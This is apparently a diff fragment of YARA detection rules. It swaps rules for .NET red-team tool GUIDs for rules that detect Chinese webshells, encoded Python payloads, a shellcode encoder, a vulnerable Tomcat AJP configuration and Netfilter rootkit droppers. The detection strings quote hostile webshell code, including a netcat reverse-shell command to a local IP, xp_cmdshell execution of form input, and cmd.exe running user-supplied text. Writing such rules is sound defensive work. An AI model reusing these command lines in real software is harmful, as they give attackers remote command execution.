+		$s1 = "program = \"cmd.exe /c net start > \" + SHELL_DIR" fullword ascii
+		$s2 = "Process pro = Runtime.getRuntime().exec(exe);" fullword ascii
+		$s3 = "<option value=\\\"nc -e cmd.exe 192.168.230.1 4444\\\">nc</option>\"" fullword ascii
+		$s4 = "cmd = \"cmd.exe /c set\";" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 715KB and 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpreg : FILE
+rule SIGNATURE_BASE_Txt_Aspxlcx : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d89b07b0-bb29-5c77-888b-322e439b4c82"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/jnqpblc/SharpReg"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4657-L4671"
+		description = "Chinese Hacktool Set - Webshells - file aspxlcx.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e01a7235-5c69-5676-ac5d-c4e4632f31b2"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L628-L644"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dfe9189c215c090bc32dedfb0d01964409265a4da4e4f8c4a2ed9ee62b1c9b30"
+		hash = "453dd3160db17d0d762e032818a5a10baf234e03"
+		logic_hash = "a6e41e6882e74b0dd55ec4afbf6f8708e28267657e304c97d1304266fe1fbc93"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "8ef25b00-ed6a-4464-bdec-17281a4aa52f" ascii wide
-		$typelibguid0up = "8EF25B00-ED6A-4464-BDEC-17281A4AA52F" ascii wide
+		$s1 = "public string remoteip = " ascii
+		$s2 = "=Dns.Resolve(host);" ascii
+		$s3 = "public string remoteport = " ascii
+		$s4 = "public class PortForward" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x253c and filesize < 18KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Memevm : FILE
+rule SIGNATURE_BASE_Txt_Xiao : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c98d84d5-4b0a-53df-b8d4-0b360930eb0c"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/TobitoFatitoRE/MemeVM"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4673-L4691"
+		description = "Chinese Hacktool Set - Webshells - file xiao.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cd375597-c343-5f7d-8574-23f700ff432b"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L646-L663"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7430b5d82012fc63459d97a21d93260ccda7ac8249bf4b56384e3b0ab6b5548a"
+		hash = "b3b98fb57f5f5ccdc42e746e32950834807903b7"
+		logic_hash = "e99c307482148e4d0eb660281fa70f2dcece200ac8aed032bbef41e421d2a155"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "ef18f7f2-1f03-481c-98f9-4a18a2f12c11" ascii wide
-		$typelibguid0up = "EF18F7F2-1F03-481C-98F9-4A18A2F12C11" ascii wide
-		$typelibguid1lo = "77b2c83b-ca34-4738-9384-c52f0121647c" ascii wide
-		$typelibguid1up = "77B2C83B-CA34-4738-9384-C52F0121647C" ascii wide
-		$typelibguid2lo = "14d5d12e-9a32-4516-904e-df3393626317" ascii wide
-		$typelibguid2up = "14D5D12E-9A32-4516-904E-DF3393626317" ascii wide
+		$s1 = "Session.Contents.Remove(m & \"userPassword\")" fullword ascii
+		$s2 = "passWord = Encode(GetPost(\"password\"))" fullword ascii
+		$s3 = "conn.Execute(\"Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED," ascii
+		$s4 = "function Command(cmd, str){" fullword ascii
+		$s5 = "echo \"if(obj.value=='PageWebProxy')obj.form.target='_blank';\"" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpdir : FILE
+rule SIGNATURE_BASE_Txt_Aspx : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f64ed564-d198-59e8-9abe-b2814b95c85f"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/jnqpblc/SharpDir"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4693-L4707"
+		description = "Chinese Hacktool Set - Webshells - file aspx.jpg"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e01a7235-5c69-5676-ac5d-c4e4632f31b2"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L665-L681"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "23eb7b88f9685457a6cdaa8161fcbc6ea60634a4f01c67a4a1307618a6f8fa14"
+		hash = "ce24e277746c317d887139a0d71dd250bfb0ed58"
+		logic_hash = "43c386bfa88db77801b0494d6a5e4406688f957ffedeb4d2ecdd244549dec708"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "c7a07532-12a3-4f6a-a342-161bb060b789" ascii wide
-		$typelibguid0up = "C7A07532-12A3-4F6A-A342-161BB060B789" ascii wide
+		$s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
+		$s2 = "Process[] p=Process.GetProcesses();" fullword ascii
+		$s3 = "Copyright &copy; 2009 Bin" ascii
+		$s4 = "<td colspan=\"5\">CmdShell&nbsp;&nbsp;:&nbsp;<input class=\"input\" runat=\"serv" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Atyourservice : FILE
+rule SIGNATURE_BASE_Txt_Sql : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3077dd0c-6936-5340-8da9-e8643de4d864"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/mitchmoser/AtYourService"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4709-L4723"
+		description = "Chinese Hacktool Set - Webshells - file Sql.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "586f23d4-3a04-520d-b75b-f9bbcf67ceeb"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L683-L699"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3e473ebb7e01cdc2edb9a20ba5ace39fd69629fb04d83510bc7855696c9ae581"
+		hash = "f7813f1dfa4eec9a90886c80b88aa38e2adc25d5"
+		logic_hash = "0712b6736d8bdc1f19b3494dc3aab9e9a04dde167b5f843e319755cd311e29bd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "bc72386f-8b4c-44de-99b7-b06a8de3ce3f" ascii wide
-		$typelibguid0up = "BC72386F-8B4C-44DE-99B7-B06A8DE3CE3F" ascii wide
+		$s1 = "cmd=chr(34)&\"cmd.exe /c \"&request.form(\"cmd\")&\" > 8617.tmp\"&chr(34)" fullword ascii
+		$s2 = "strQuery=\"dbcc addextendedproc ('xp_regwrite','xpstar.dll')\"" fullword ascii
+		$s3 = "strQuery = \"exec master.dbo.xp_cmdshell '\" & request.form(\"cmd\") & \"'\" " fullword ascii
+		$s4 = "session(\"login\")=\"\"" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 15KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Lockless : FILE
+rule SIGNATURE_BASE_Txt_Hello : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f9b31f57-d721-5b6c-be63-b8309cba788a"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/GhostPack/LockLess"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4725-L4739"
+		description = "Chinese Hacktool Set - Webshells - file hello.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "42d01411-e333-543d-84a2-758c13bad2df"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L701-L717"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b3f929e2a7ee7f3b82cafcffe89572e210ca817edeb261810b9a2191ba308c3d"
+		hash = "697a9ebcea6a22a16ce1a51437fcb4e1a1d7f079"
+		logic_hash = "823a0a74b07c8f4821247b3cf0450069a9888d44ccd87144330da88594f260c0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "a91421cb-7909-4383-ba43-c2992bbbac22" ascii wide
-		$typelibguid0up = "A91421CB-7909-4383-BA43-C2992BBBAC22" ascii wide
+		$s0 = "Dim myProcessStartInfo As New ProcessStartInfo(\"cmd.exe\")" fullword ascii
+		$s1 = "myProcessStartInfo.Arguments=\"/c \" & Cmd.text" fullword ascii
+		$s2 = "myProcess.Start()" fullword ascii
+		$s3 = "<p align=\"center\"><a href=\"?action=cmd\" target=\"_blank\">" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
-}
-rule SIGNATURE_BASE_HKTL_NET_GUID_Easynet : FILE
-{
-	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8408a057-4910-5d7b-80bc-78df17c95bf7"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/TheWover/EasyNet"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4741-L4759"
+		filesize < 25KB and all of them
+}
+rule SIGNATURE_BASE_Gen_Python_Pyminifier_Encoded_Payload : FILE
+{
+	meta:
+		description = "Detects python code encoded by pyminifier. Used by the Machete malware as researched by ESET"
+		author = "John Lambert @JohnLaTwC"
+		id = "d7297e6a-e1c7-57dd-a57f-a3b67face2f3"
+		date = "2019-12-16"
+		modified = "2023-12-05"
+		reference = "https://github.com/liftoff/pyminifier"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_python_pyminifier_encoded_payload.yar#L1-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e8502f3d178897f17cdaab0608b5605aeb9161c42779a9d9c1477a5663dd24a1"
+		hash = "01df8765ea35db382d1dd67a502bf1d9647d8fe818ec31abff41c7e41c2816c0"
+		hash = "15d201152a9465497a0f9dd6939e48315b358702c5e2a3c506ad436bb8816da7"
+		hash = "ab91f76394ddf866cc0b315d862a19b57ded93be5dfc2dd0a81e6a43d0c5f301"
+		hash = "b67256906d976aafb6071d23d1b3f59a1696f26b25ff4713b9342d41e656dfba"
+		hash = "d5664c70f3543f306f765ea35e22829dbea66aec729e8e11edea9806d0255b7e"
+		hash = "dd2b0e2c2cb8a83574248bda54ce472899b22eb602e8ebecafcce2c4355177fe"
+		hash = "ed76bd136f40a23aeffe0aba02f13b9fea3428c19b715aafa6ea9be91e4006ca"
+		hash = "b454179c13cb4727ae06cc9cd126c3379e2aded5c293af0234ac3312bf9bdad2"
+		logic_hash = "6e744d9404ca476766b217fe808ba6a8cc6cbf09232a69aae6259acd377080a0"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "3097d856-25c2-42c9-8d59-2cdad8e8ea12" ascii wide
-		$typelibguid0up = "3097D856-25C2-42C9-8D59-2CDAD8E8EA12" ascii wide
-		$typelibguid1lo = "ba33f716-91e0-4cf7-b9bd-b4d558f9a173" ascii wide
-		$typelibguid1up = "BA33F716-91E0-4CF7-B9BD-B4D558F9A173" ascii wide
-		$typelibguid2lo = "37d6dd3f-5457-4d8b-a2e1-c7b156b176e5" ascii wide
-		$typelibguid2up = "37D6DD3F-5457-4D8B-A2E1-C7B156B176E5" ascii wide
+		$s1 = "exec(zlib.decompress(base64.b64decode('eJ"
+		$s2 = "base64" fullword
+		$s3 = "zlib" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 20KB and uint32be( 0 ) == 0x696d706f and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpbyebear : FILE
+rule SIGNATURE_BASE_Hunting_Rule_Shikataganai
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "4a7f2514-2519-5fd5-9d17-110a67f829e7"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/S3cur3Th1sSh1t/SharpByeBear"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4761-L4777"
+		description = "No description has been set in the source file - Signature Base"
+		author = "Steven Miller"
+		id = "fe266a42-0480-5a98-9368-8a18aa5e4f69"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_shikataganai.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c6d9fd33dd8d7bddd9e80e3c0106f0cab13f0952bb8269a10df147c06a5bd7ba"
-		score = 75
+		logic_hash = "733522cb1d61f4bbb300d73ff21d9d7d10a78aae06e03408fce4b88e4c51f662"
+		score = 50
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		company = "FireEye"
 
 	strings:
-		$typelibguid0lo = "a6b84e35-2112-4df2-a31b-50fde4458c5e" ascii wide
-		$typelibguid0up = "A6B84E35-2112-4DF2-A31B-50FDE4458C5E" ascii wide
-		$typelibguid1lo = "3e82f538-6336-4fff-aeec-e774676205da" ascii wide
-		$typelibguid1up = "3E82F538-6336-4FFF-AEEC-E774676205DA" ascii wide
+		$varInitializeAndXorCondition1_XorEAX = { B8 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 59 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 40 | 41 | 42 | 43 | 45 | 46 | 47 ) ?? }
+		$varInitializeAndXorCondition1_XorEBP = { BD ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B | 5C | 5E | 5F ) [0-50] 31 ( 68 | 69 | 6A | 6B | 6D | 6E | 6F ) ?? }
+		$varInitializeAndXorCondition1_XorEBX = { BB ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5C | 5D | 5E | 5F ) [0-50] 31 ( 58 | 59 | 5A | 5B | 5D | 5E | 5F ) ?? }
+		$varInitializeAndXorCondition1_XorECX = { B9 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 48 | 49 | 4A | 4B | 4D | 4E | 4F ) ?? }
+		$varInitializeAndXorCondition1_XorEDI = { BF ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B | 5C | 5D | 5E ) [0-50] 31 ( 78 | 79 | 7A | 7B | 7D | 7E | 7F ) ?? }
+		$varInitializeAndXorCondition1_XorEDX = { BA ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 50 | 51 | 52 | 53 | 55 | 56 | 57 ) ?? }
+		$varInitializeAndXorCondition2_XorEAX = { D9 74 24 F4 [0-30] B8 ?? ?? ?? ?? [0-10] ( 59 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 40 | 41 | 42 | 43 | 45 | 46 | 47 ) ?? }
+		$varInitializeAndXorCondition2_XorEBP = { D9 74 24 F4 [0-30] BD ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B | 5C | 5E | 5F ) [0-50] 31 ( 68 | 69 | 6A | 6B | 6D | 6E | 6F ) ?? }
+		$varInitializeAndXorCondition2_XorEBX = { D9 74 24 F4 [0-30] BB ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5C | 5D | 5E | 5F ) [0-50] 31 ( 58 | 59 | 5A | 5B | 5D | 5E | 5F ) ?? }
+		$varInitializeAndXorCondition2_XorECX = { D9 74 24 F4 [0-30] B9 ?? ?? ?? ?? [0-10] ( 58 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 48 | 49 | 4A | 4B | 4D | 4E | 4F ) ?? }
+		$varInitializeAndXorCondition2_XorEDI = { D9 74 24 F4 [0-30] BF ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B | 5C | 5D | 5E ) [0-50] 31 ( 78 | 79 | 7A | 7B | 7D | 7E | 7F ) ?? }
+		$varInitializeAndXorCondition2_XorEDX = { D9 74 24 F4 [0-30] BA ?? ?? ?? ?? [0-10] ( 58 | 59 | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 50 | 51 | 52 | 53 | 55 | 56 | 57 ) ?? }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharphide : FILE
+rule SIGNATURE_BASE_VUL_Tomcat_Catalina_CVE_2020_1938 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "928e00c1-549a-58f5-9e7e-982a4319691a"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/outflanknl/SharpHide"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4779-L4793"
+		description = "Detects a possibly active and vulnerable Tomcat configuration that includes an accessible and unprotected AJP connector (you can ignore backup files or files that are not actively used)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d23af7ce-eb5d-50aa-be02-b4bf858641c2"
+		date = "2020-02-28"
+		modified = "2023-12-05"
+		reference = "https://www.chaitin.cn/en/ghostcat"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_cve_2020_1938.yar#L2-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3efa5458dcdf447184b91f8fa075c46c82aea25d619c43eabccce4d85ff15f38"
-		score = 75
+		logic_hash = "902b469c8a31add2254e8d5ade6bc22f1bc0a2b10ea70f3131f0640f2900e667"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "443d8cbf-899c-4c22-b4f6-b7ac202d4e37" ascii wide
-		$typelibguid0up = "443D8CBF-899C-4C22-B4F6-B7AC202D4E37" ascii wide
+		$h1 = "<?xml "
+		$a1 = "<Service name=\"Catalina\">" ascii
+		$v1 = "<Connector port=\"8009\" protocol=\"AJP/1.3\" redirectPort=\"8443\"/>" ascii
+		$fp1 = "<!--<Connector port=\"8009\" protocol=\"AJP/1.3\" redirectPort=\"8443\"" ascii
+		$fp2 = " secret=\"" ascii
+		$fp3 = " requiredSecret=\"" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		$h1 at 0 and filesize <= 300KB and $a1 and $v1 and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpsvc : FILE
+rule SIGNATURE_BASE_MAL_Netfilter_Dropper_Jun_2021_1_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "cbc1d7d4-f3b4-5d02-84ae-621398cb7b51"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/jnqpblc/SharpSvc"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4795-L4809"
+		description = "Detects the dropper of Netfilter rootkit"
+		author = "Arkbird_SOLG"
+		id = "d91f48aa-9580-572d-a72c-19b80624cdbe"
+		date = "2020-06-18"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/struppigel/status/1405483373280235520"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_netfilter.yar#L4-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "61a4269200c699c5d00bde40e11cfec92da5cf7c7aeaffaedf60e70bcb31ccdf"
+		logic_hash = "b70eb5d2d234d0f523c41fa146f315cf7239bbe7a988b393e75ea6cf6aa438d3"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a5c873085f36f69f29bb8895eb199d42ce86b16da62c56680917149b97e6dac"
+		hash2 = "659e0d1b2405cadfa560fe648cbf6866720dd40bb6f4081d3dce2dffe20595d9"
+		hash3 = "d0a03a8905c4f695843bc4e9f2dd062b8fd7b0b00103236b5187ff3730750540"
+		tlp = "White"
+		adversary = "Chinese APT Group"
 
 	strings:
-		$typelibguid0lo = "52856b03-5acd-45e0-828e-13ccb16942d1" ascii wide
-		$typelibguid0up = "52856B03-5ACD-45E0-828E-13CCB16942D1" ascii wide
+		$seq1 = { b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fe ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 00 00 88 85 dc fd ff ff b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fd ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 50 00 50 e8 ?? 0d 00 00 83 c4 04 89 85 d8 fd ff ff 8b 85 d8 fd ff ff 89 85 d4 fd ff ff b8 00 00 50 00 50 b8 00 00 00 00 50 8b 85 d8 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c 8b 45 0c 8b 8d d8 fd ff ff 89 08 b8 3c 00 00 00 50 b8 00 00 00 00 50 8d 85 98 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c b8 3c 00 00 00 89 85 98 fd ff ff 8d 85 98 fd ff ff 83 c0 10 8d 8d dc fe ff ff 89 08 8d 85 98 fd ff ff 83 c0 14 b9 00 01 00 00 89 08 8d 85 98 fd ff ff 83 c0 2c 8d 8d dc fd ff ff 89 08 8d 85 98 fd ff ff 83 c0 30 b9 00 01 00 00 89 08 b8 0a 31 40 00 50 e8 ?? 0c 00 00 89 85 94 fd ff ff b8 16 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 fc b8 28 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 f8 b8 36 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f4 b8 47 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f0 b8 58 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 ec b8 69 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e8 b8 7a 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e4 b8 8e 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e0 8b 45 08 50 e8 ?? 0b 00 00 83 c4 04 8d 8d 98 fd ff ff 51 b9 00 00 00 00 51 50 8b 45 08 50 8b 45 fc ff d0 85 }
+		$seq2 = { b8 00 00 00 00 89 85 90 fd ff ff b8 00 00 00 00 89 85 8c fd ff ff b8 00 00 00 00 89 85 88 fd ff ff b8 00 00 00 00 89 85 84 fd ff ff b8 04 00 00 00 89 85 80 fd ff ff b8 00 00 00 00 88 85 7f f5 ff ff b8 00 08 00 00 50 b8 00 00 00 00 50 8d 85 80 f5 ff ff 50 e8 ?? 0b 00 00 83 c4 0c b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 9d 31 40 00 50 8b 45 f8 ff d0 89 85 90 fd ff ff 8b 85 }
+		$s1 = "%s\\netfilter.sys" fullword ascii
+		$s2 = "SYSTEM\\CurrentControlSet\\Services\\netfilter" fullword ascii
+		$s3 = "\\\\.\\netfilter" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize > 6KB and filesize < 1000KB and ( all of ( $seq* ) or 2 of ( $s* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcrasheventlog : FILE
+rule SIGNATURE_BASE_MAL_Netfilter_May_2021_1_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "85d31989-ad96-5005-a747-8a19a67fdd80"
-		date = "2021-01-21"
-		modified = "2023-04-06"
-		reference = "https://github.com/slyd0g/SharpCrashEventLog"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4811-L4825"
+		description = "Detects Netfilter rootkit"
+		author = "Arkbird_SOLG"
+		id = "0ac01eb3-435b-52b0-b8e8-ace2ebb34f60"
+		date = "2020-06-18"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/struppigel/status/1405483373280235520"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_netfilter.yar#L28-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5f286244243024d23a6a27e5713a7ecedef9028b317d5827f35254a35e6c5473"
+		logic_hash = "ba72bbc38c27d0c8d6eea7d513c3ca40276edd929c93abae4098639f7d7649a5"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
